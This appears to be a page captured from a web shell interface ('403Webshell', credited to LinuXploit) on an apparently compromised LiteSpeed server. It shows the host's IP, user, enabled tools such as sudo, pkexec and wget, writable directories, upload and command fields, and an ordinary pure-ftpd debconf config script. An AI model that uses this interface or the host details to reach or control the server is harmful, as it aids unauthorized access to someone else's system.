403Webshell
Server IP : 195.114.193.97  /  Your IP : 216.73.217.93
Web Server : LiteSpeed
System : Linux host 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
User : sembi4241 ( 1126)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/pure-ftpd-common.config
#!/bin/sh
set -e

# Source debconf library.
. /usr/share/debconf/confmodule

db_version 2.0

if [ -e /etc/default/pure-ftpd-common ]; then
	. /etc/default/pure-ftpd-common || true
	if [ "$STANDALONE_OR_INETD" ]; then
		db_set pure-ftpd/standalone-or-inetd "$STANDALONE_OR_INETD"
	fi
	if [ "$VIRTUALCHROOT" ]; then
		db_set pure-ftpd/virtualchroot "$VIRTUALCHROOT"
	fi
fi

db_beginblock
db_input medium pure-ftpd/standalone-or-inetd || true
db_input medium pure-ftpd/ftpwho-setuid || true
db_endblock
db_go

db_input medium pure-ftpd/virtualchroot || true
db_go

if grep 'OPTIONS=' /etc/default/pure-ftpd-common > /dev/null 2>&1
then
	db_input high pure-ftpd/config-obsolete-note || true
	db_go
fi

if test -f /etc/inetd.conf-pureftpd.preinst
then
	db_input high pure-ftpd/saved-inetd-config || true
	db_go
fi

# check if we need to warn about changed MinUID setting
if [ "$2" ] && dpkg --compare-versions "$2" lt 1.0.16 \
	&& dpkg --compare-versions "$2" gt 1.0.13; then
	db_input high pure-ftpd/minuid || true
	db_go
fi

db_stop

Youez - 2016 - github.com/yon3zu
LinuXploit